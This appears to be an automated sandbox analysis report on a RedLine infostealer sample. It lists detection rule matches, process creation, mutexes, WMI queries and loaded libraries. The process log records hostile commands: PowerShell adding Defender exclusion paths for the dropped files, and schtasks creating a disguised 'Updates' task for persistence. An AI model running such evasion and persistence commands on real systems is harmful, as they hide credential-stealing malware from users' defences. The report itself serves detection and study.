                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: PO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: QntRsaVyLKlY.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: _0020.SetAccessControl
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: _0020.AddAccessRule
                    Source: 7.2.PO.exe.7500000.7.raw.unpack, x3jKeUAdnBO4kHagia.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, x3jKeUAdnBO4kHagia.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: _0020.SetAccessControl
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: _0020.AddAccessRule
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: _0020.SetAccessControl
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.csSecurity API names: _0020.AddAccessRule
                    Source: 7.2.PO.exe.43feae0.1.raw.unpack, x3jKeUAdnBO4kHagia.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/102@1/1
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C7DB06 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00C7DB06
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMutant created: \Sessions\1\BaseNamedObjects\uRVVaFUUJELQIo
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCommand line argument: sfxname0_2_00C80F8F
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCommand line argument: sfxstime0_2_00C80F8F
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCommand line argument: STARTDLG0_2_00C80F8F
                    Source: owKQ0b029a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2373502657.0000000007C44000.00000004.00000020.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2368393020.00000000068C5000.00000004.00000020.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000338F000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000331B000.00000004.00000800.00020000.00000000.sdmp, tmpA3E9.tmp.22.dr, tmpBC4F.tmp.15.dr, tmp47A1.tmp.22.dr, tmp155D.tmp.15.dr, tmp478F.tmp.22.dr, tmpA41B.tmp.22.dr, tmpA40B.tmp.22.dr, tmpA42C.tmp.22.dr, tmpA43C.tmp.15.dr, tmp155E.tmp.15.dr, tmpDD25.tmp.15.dr, tmp477F.tmp.22.dr, tmpBC3D.tmp.15.dr, tmpBC1D.tmp.15.dr, tmpDD35.tmp.15.dr, tmp4790.tmp.22.dr, tmp157F.tmp.15.dr, tmpBC60.tmp.15.dr, tmpBC70.tmp.15.dr, tmpA3FA.tmp.22.dr, tmp47A2.tmp.22.dr, tmp47B3.tmp.22.dr, tmpBC4E.tmp.15.dr, tmp1580.tmp.15.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: owKQ0b029a.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeFile read: C:\Users\user\Desktop\owKQ0b029a.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\owKQ0b029a.exe "C:\Users\user\Desktop\owKQ0b029a.exe"
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp"
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: dxgidebug.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: twinui.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: bcp47mrm.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: windows.ui.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: windowmanagementapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: inputhost.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeSection loaded: appresolver.dllJump to behavior
